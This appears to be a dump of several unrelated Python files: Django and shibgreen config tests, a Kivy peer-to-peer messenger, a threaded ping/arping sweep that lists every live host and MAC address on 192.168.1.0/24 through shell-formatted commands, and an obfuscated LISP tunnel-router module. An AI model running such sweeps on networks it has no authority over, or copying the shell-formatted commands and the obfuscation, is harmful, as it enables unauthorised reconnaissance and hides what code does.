assert len(kwargs) == 1 and "using" in kwargs
elif event_type == "django.orm.m2m_change":
assert len(kwargs) == 5 and all(k in kwargs for k in ("action", "reverse", "model", "pk_set", "using"))
elif event_type in ("django.orm.pre_migrate", "django.orm.post_migrate"):
assert len(kwargs) == 6 and all(k in kwargs for k in ("app_config", "verbosity", "interactive", "using",
"apps", "plan"))
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def test_events_handler(event):
data = event.Data()
data["test_env"] = True
event.SetData(data)
default_handler(event)
@override_settings(
CLOUDEVENTS_ENV={
"SINK_VAR": "MOCK_SINK",
"SOURCE_VAR": "TEST_SOURCE",
},
CLOUDEVENTS_HANDLER=test_events_handler
)
class SourceTestCase(TestCase):
def setUp(self):
self.mock_server_port = get_free_port()
self.mock_server = HTTPServer(('localhost', self.mock_server_port), MockServerRequestHandler)
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
self.mock_server_thread.setDaemon(True)
self.mock_server_thread.start()
os.environ["MOCK_SINK"] = "http://localhost:%s" % self.mock_server_port
os.environ["TEST_SOURCE"] = "test-orm-source"
pre_init.connect(send_cloudevent, sender=FakeSourceModel)
post_init.connect(send_cloudevent, sender=FakeSourceModel)
pre_save.connect(send_cloudevent, sender=FakeSourceModel)
post_save.connect(send_cloudevent, sender=FakeSourceModel)
pre_delete.connect(send_cloudevent, sender=FakeSourceModel)
post_delete.connect(send_cloudevent, sender=FakeSourceModel)
@FakeSourceModel.fake_me
def test_send_event(self):
fake_source = FakeSourceModel.objects.create(name="fake_source", enabled=True)
fake_source.enabled = False
fake_source.save()
fake_source.delete()
|
ping2_advanced.py
|
#! /usr/bin/env python3
# -*-coding:utf-8 -*-
# @Time : 2019/06/16 16:44:29
# @Author : che
# @Email : ch1huizong@gmail.com
# 多队列和多线程池, 会把活动的结果加入到arping队列
import re
from threading import Thread
import subprocess
from queue import Queue
num_ping_threads = 3
num_arp_threads = 3
in_queue = Queue()
out_queue = Queue()
ips = ["192.168.1.%d" % ip for ip in range(1, 255)]
def pinger(i, iq, oq):
while True:
ip = iq.get()
# print('Thread %s: Pinging %s' % (i, ip))
ret = subprocess.call(
"ping -c1 %s " % ip,
shell=True,
stdout=open("/dev/null", "w"),
stderr=subprocess.STDOUT,
)
if ret == 0:
oq.put(ip)
else:
pass
# print("%s: did not respond" % ip)
iq.task_done()
def arping(i, oq):
while True:
ip = oq.get()
p = subprocess.Popen(
"arping -I wlp3s0 -c5 %s" % ip, shell=True, stdout=subprocess.PIPE
)
out = p.stdout.read().decode()
# 提取mac地址
result = out.split()
pattern = re.compile(":")
macaddr = None
for item in result:
if re.search(pattern, item):
macaddr = item
break
print("IP Address: %s | Mac Address: %s" % (ip, macaddr))
oq.task_done()
def main():
# 创建ping线程池
for i in range(num_ping_threads):
worker = Thread(target=pinger, args=(i, in_queue, out_queue))
worker.setDaemon(True)
worker.start()
# 创建arping线程池
for i in range(num_arp_threads):
worker = Thread(target=arping, args=(i, out_queue))
worker.setDaemon(True)
worker.start()
# 向队列添加任务
for ip in ips:
in_queue.put(ip)
print("Main Thread Waiting")
in_queue.join() # 两种线程通过queue传递
out_queue.join()
print("Done")
main()
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from shibgreen.util.config import create_default_shibgreen_config, initial_config_file, load_config, save_config
from shibgreen.util.path import mkdir
from multiprocessing import Pool, TimeoutError
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aide in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_shibgreen_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_shibgreen_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_shibgreen_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_shibgreen_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_shibgreen_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 44428
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written-to as a whole.
"""
# Artifically inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
try:
res.get(timeout=60)
except TimeoutError:
pytest.skip("Timed out waiting for reader/writer processes to complete")
|
MessengerMDApp.py
|
import os
import socket as st
import sys
from datetime import datetime
from functools import partial
from socket import socket
from threading import Thread
from typing import Any
from encryption import create_rsa_files, new_cipher
from kivy_imports import (
Builder,
Clock,
Config,
Keyboard,
ObjectProperty,
ScrollView,
Sound,
SoundLoader,
Widget,
Window,
escape_markup,
resource_add_path,
)
from kivymd.app import MDApp
from kivymd.uix.dialog import MDDialog
from kivymd.uix.list import CheckboxLeftWidget, MDList
from kivymd.uix.textfield import MDTextField
from networking import Message, MessengerSocket
from widgets import InformationItem, MessageItem, SoundItem
own_port = None
message_port = None
ip_set: set[str] = set()
class MessageInput(MDTextField):
output = ObjectProperty(MDList)
username = ObjectProperty(MDTextField)
ip_input = ObjectProperty(MDTextField)
scroll_view = ObjectProperty(ScrollView)
ip_set_for_widget = ObjectProperty(ip_set)
"""giving the kv file the set of ip_adresses"""
receiver: str
item: MessageItem
name: str
message: Message
incoming_message: Message
sound: Sound | None = None
def check_disabled(self, *args: Any, **kwargs: Any):
return (
self.ip_input.text if self.ip_input.text != "" else "127.0.0.1"
) not in ip_set
def keyboard_on_key_down(
self,
window: Keyboard,
keycode: tuple[int, str],
text: str,
modifiers: list[str],
) -> bool | None:
if keycode[1] in ["enter", "return"]:
self.send_message()
return
return super().keyboard_on_key_down(window, keycode, text, modifiers)
def insert_msg(
self, title: str, message: str, i_o: str, *args: Any, **kwargs: Any
) -> None:
if i_o == "incoming":
self.item = MessageItem(title, message, "left")
elif i_o == "outgoing":
self.item = MessageItem(title, message, "right")
self.output.add_widget(self.item)
self.scroll_view.scroll_to(self.item)
return
def send_message(self) -> None:
if not self.ip_input.error and self.ip_input.text != "":
self.receiver: str = self.ip_input.text
else:
self.receiver: str = "127.0.0.1"
if self.receiver in ip_set:
if self.text == "":
return
self.name: str = self.username.text[:9]
self.message = Message(name=self.name, msg=self.text[:1000])
esc_time: str = escape_markup(f"[{datetime.now().strftime('%H:%M')}] ")
serversocket.sendto(self.message.encoded(), (self.receiver, message_port))
if not self.name:
self.insert_msg(f"{esc_time} You:", self.text, "outgoing")
else:
self.insert_msg(
f"{esc_time} {self.name} (You):",
self.text,
"outgoing",
)
# if sound:
# sound.play()
else:
with open("pubkey.pem", "rb") as f:
with socket() as send_key_socket:
send_key_socket.bind(("", 0))
# sendkey_port = send_key_socket.getsockname()[1]
send_key_socket.connect((self.receiver, self.key_port))
send_key_socket.sendfile(f, 0)
self.disabled = False
self.text = ""
self.focus = True
self.error = False
ip_set.add(self.receiver)
return
def listen_for_key(self) -> None:
with socket() as key_socket:
key_socket.bind(("", 0))
self.key_port = key_socket.getsockname()[1]
key_socket.listen(1)
while True:
sc, address = key_socket.accept()
while data := sc.recv(1024):
print(data)
with open(f"pub-keys/{address[0]}.pem", "wb") as keyfile:
keyfile.write(data)
def listen_for_msg(self) -> None:
while True:
json_data, address = serversocket.recvfrom(1024)
if self.sound:
self.sound.play()
self.incoming_message = Message()
self.incoming_message.update_dict(json_data)
current_time = datetime.now().strftime("%H:%M")
curry_time = f"[{current_time}] "
esc_time = escape_markup(curry_time)
if self.incoming_message.name != "":
msg_title = esc_time + self.incoming_message.name
if address[0] == "127.0.0.1":
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title} (You):",
self.incoming_message.msg,
"incoming",
)
)
else:
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title}:",
self.incoming_message.msg,
"incoming",
)
)
elif address[0] == "127.0.0.1":
msg_title = esc_time + address[0]
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title} (You):",
self.incoming_message.msg,
"incoming",
)
)
else:
msg_title = esc_time + address[0]
Clock.schedule_once(
partial(
self.insert_msg,
f"{msg_title}:",
self.incoming_message.msg,
"incoming",
)
)
def on_parent(self, *args: Any, **kwargs: Any) -> None:
receivethread = Thread(target=self.listen_for_msg, daemon=True)
receivethread.start()
keyrcvthread = Thread(target=self.listen_for_key, daemon=True)
keyrcvthread.start()
class MessengerWindow(MDApp):
confirmation_dialog = None
information_dialog = None
title = "Messenger"
def __init__(self, **kwargs: Any) -> None:
Window.softinput_mode = "below_target" # type: ignore
Config.set("input", "mouse", "mouse,multitouch_on_demand")
super().__init__(**kwargs)
self.theme_cls.primary_palette = "Green"
def build(self) -> None:
self.theme_cls.theme_style = "Dark"
self.icon = ""
return Builder.load_file("./messengerMD.kv")
def change_sound_and_set_icon(
self, instance_check: CheckboxLeftWidget, item: SoundItem
) -> None:
print(self.root.children[0].children[1].sound) # type: ignore
instance_check.active = True
check_list: list[Widget] = instance_check.get_widgets(instance_check.group)
for check in check_list:
if check != instance_check:
check.active = False
sound_name = item.text
if sound_name == "no sound":
self.root.children[0].children[1].sound = None # type: ignore
return
self.root.children[0].children[1].sound = SoundLoader.load(
f"sounds/{sound_name}"
) # pyright: reportUnknownMemberType=false
def show_information_dialog(self):
if not self.information_dialog:
self.information_dialog = MDDialog(
title="Port & IP Address",
type="simple",
items=[
InformationItem(text=own_ip, icon="map-marker"),
InformationItem(text=str(message_port), icon="ethernet"),
],
)
self.information_dialog.open()
def show_confirmation_dialog(self) -> None:
if not self.confirmation_dialog:
self.confirmation_dialog = MDDialog(
title="Choose sound:",
type="simple",
items=[
SoundItem(text="no sound"),
SoundItem(text="bakugo.mp3"),
SoundItem(text="jamie.mp3"),
SoundItem(text="peekaboo.mp3"),
SoundItem(text="sound.wav"),
SoundItem(text="tequila.mp3"),
],
)
self.confirmation_dialog.open()
if __name__ == "__main__":
if hasattr(sys, "_MEIPASS"):
resource_add_path(os.path.join(sys._MEIPASS)) # type: ignore
try:
os.mkdir("pubkeys")
except OSError:
pass
else:
print("folder created")
serversocket = MessengerSocket()
serversocket.bind(("", 0))
message_port = serversocket.getsockname()[1]
own_ip = st.gethostbyname(st.gethostname())
create_rsa_files()
new_aes = new_cipher()
MessengerWindow().run()
else:
print("imports not allowed")
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = lisp . lisp_get_ephemeral_port ( )
iiI1iIiI = None
OOo = None
Ii1IIii11 = None
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
OOo000 = [ ]
if 82 - 82: I11i . I1Ii111 / IiII % II111iiii % iIii1I11I1II1 % IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
def i11IiIiiIIIII ( parameter ) :
global OOo000
if 22 - 22: Ii1I * O0 / o0oOOo0O0Ooo
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
OOo000 ) )
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
def i1iIIIiI1I ( parameter ) :
global OOo000
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , OOo000 ,
True ) )
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
if 66 - 66: Ii1I - OoooooooOO * OoooooooOO . OOooOOo . I1ii11iIi11i
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
def o0OOOOO00o0O0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
if 71 - 71: ooOoO0o % iII111i / o0oOOo0O0Ooo
if 49 - 49: II111iiii % iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
def oO00 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
if 53 - 53: OoooooooOO . i1IIi
if 18 - 18: o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
def o00O ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
if 69 - 69: oO0o % I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - O0 % OoooooooOO
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
def II1i1IiiIIi11 ( mc , parms ) :
iI1Ii11iII1 , Oo0O0O0ooO0O , IIIIii , O0o0 = parms
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
oO0OOoO0 = "{}:{}" . format ( Oo0O0O0ooO0O . print_address_no_iid ( ) , IIIIii )
I111Ii111 = lisp . green ( mc . print_eid_tuple ( ) , False )
i111IiI1I = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( O0o0 , lisp . red ( oO0OOoO0 , False ) , I111Ii111 , "{}" , "{}" )
if 70 - 70: Ii1I . Oo0Ooo / o0oOOo0O0Ooo . Ii1I - O0 / IiII
if 62 - 62: iIii1I11I1II1 * OoOoOO00
for i1 in mc . rloc_set :
if ( i1 . rle ) :
for OOO in i1 . rle . rle_nodes :
if ( OOO . rloc_name != O0o0 ) : continue
OOO . store_translated_rloc ( Oo0O0O0ooO0O , IIIIii )
Oo0oOOo = OOO . address . print_address_no_iid ( ) + ":" + str ( OOO . translated_port )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
lisp . lprint ( i111IiI1I . format ( "RLE" , Oo0oOOo ) )
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
if ( i1 . rloc_name != O0o0 ) : continue
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
Oo0oOOo = i1 . rloc . print_address_no_iid ( ) + ":" + str ( i1 . translated_port )
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if ( lisp . lisp_crypto_keys_by_rloc_encap . has_key ( Oo0oOOo ) ) :
o000O0o = lisp . lisp_crypto_keys_by_rloc_encap [ Oo0oOOo ]
lisp . lisp_crypto_keys_by_rloc_encap [ oO0OOoO0 ] = o000O0o
if 42 - 42: OoOoOO00
if 41 - 41: Oo0Ooo . ooOoO0o + O0 * o0oOOo0O0Ooo % Oo0Ooo * Oo0Ooo
if 19 - 19: iII111i
if 46 - 46: I1ii11iIi11i - Ii1I . iIii1I11I1II1 / I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
i1 . delete_from_rloc_probe_list ( mc . eid , mc . group )
i1 . store_translated_rloc ( Oo0O0O0ooO0O , IIIIii )
i1 . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( i111IiI1I . format ( "RLOC" , Oo0oOOo ) )
if 13 - 13: OOooOOo / i11iIiiIii
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if ( lisp . lisp_rloc_probing ) :
O0oOO0O = None if ( mc . group . is_null ( ) ) else mc . eid
oO = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( iI1Ii11iII1 , 0 , O0oOO0O , oO , i1 )
if 7 - 7: o0oOOo0O0Ooo - I1IiiI
if 100 - 100: oO0o + I11i . OOooOOo * Ii1I
if 73 - 73: i1IIi + I1IiiI
if 46 - 46: OoO0O00 . Oo0Ooo - OoooooooOO
if 93 - 93: iII111i
if 10 - 10: I11i
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
if 82 - 82: I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
def i1iIIIi1i ( mc , parms ) :
if 43 - 43: OoOoOO00 % OOooOOo
if 5 - 5: i11iIiiIii - i1IIi / iIii1I11I1II1
if 26 - 26: I11i . OoooooooOO
if 39 - 39: iII111i - O0 % i11iIiiIii * I1Ii111 . IiII
if ( mc . group . is_null ( ) ) : return ( II1i1IiiIIi11 ( mc , parms ) )
if 58 - 58: OoO0O00 % i11iIiiIii . iII111i / oO0o
if ( mc . source_cache == None ) : return ( True , parms )
if 84 - 84: iII111i . I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
mc . source_cache . walk_cache ( II1i1IiiIIi11 , parms )
return ( True , parms )
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
def i1I1iI1iIi111i ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( i1iIIIi1i ,
[ sockets , rloc , port , hostname ] )
return
if 44 - 44: i1IIi % II111iiii + I11i
if 45 - 45: iII111i / iII111i + I1Ii111 + ooOoO0o
if 47 - 47: o0oOOo0O0Ooo + ooOoO0o
if 82 - 82: II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
def O0O ( lisp_packet , thread_name ) :
global II1iII1i , i1I1I , iiI1I
global iiI1iIiI , OOo
if 12 - 12: i11iIiiIii - i1IIi - OoO0O00 . i1IIi - OOooOOo + O0
oO0OOOO0 = lisp_packet
if 26 - 26: Ii1I
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
if 47 - 47: iII111i - Ii1I . II111iiii + OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
oO0 = oO0OOOO0 . packet
O0OO0O = oO0
O0OO0O , OO , IIIIii , OoOoO = lisp . lisp_is_rloc_probe ( O0OO0O , - 1 )
if ( oO0 != O0OO0O ) :
if ( OO == None ) : return
lisp . lisp_parse_packet ( II1iII1i , O0OO0O , OO , IIIIii , OoOoO )
return
if 43 - 43: i11iIiiIii + Oo0Ooo * II111iiii * I1Ii111 * O0
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
oO0OOOO0 . packet = lisp . lisp_reassemble ( oO0OOOO0 . packet )
if ( oO0OOOO0 . packet == None ) : return
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if ( lisp . lisp_flow_logging ) : oO0OOOO0 = copy . deepcopy ( oO0OOOO0 )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if ( oO0OOOO0 . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
oO0OOOO0 . print_packet ( "Receive-({})" . format ( thread_name ) , True )
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
oO0OOOO0 . strip_outer_headers ( )
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
